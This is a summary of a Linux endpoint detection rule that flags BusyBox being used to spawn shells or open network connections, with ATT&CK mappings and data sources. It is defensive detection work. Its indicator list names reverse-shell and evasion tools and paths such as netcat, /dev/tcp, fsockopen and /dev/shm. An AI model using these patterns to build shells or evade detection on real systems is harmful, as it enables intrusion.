
Summary
This rule detects suspicious BusyBox usage on Linux endpoints where BusyBox is invoked to spawn a shell or to perform actions that establish network connections, potentially enabling command execution or command-and-control behaviors while attempting to evade detection. The detection uses an EQL query that targets Linux process start events with process.name == busybox and specific arguments that indicate shell invocation (bash, dash, sh, etc.) and a command_line containing indicators of shell or network activity (nc/netcat, openssl, telnet, system/io.popen/os.execute/fsockopen, inet/tcp, /dev/tcp, /dev/udp, nohup, setsid, /dev/shm, ld-linux*.so, /tmp, /var/tmp, rm -rf, etc.). It further analyzes parent process context to assess whether the BusyBox invocation is wrapped by typical benign ancestors, and excludes certain known-safe patterns (e.g., runc, make, process-wrapper) to reduce false positives. The rule maps to MITRE ATT&CK techniques: Execution (T1059 Unix Shell), Command and Control (T1071 - Application Layer Protocol), and Defense Evasion (T1218 System Binary Proxy Execution). Data sources include Elastic Defend and SentinelOne. The rule is designed to flag potentially malicious BusyBox proxy/executable behaviors on Linux endpoints for further investigation.
Categories
- Endpoint
- Linux
Data Sources
- Process
- Command
ATT&CK Techniques
- T1059
- T1059.004
- T1071
- T1218
Created: 2026-07-02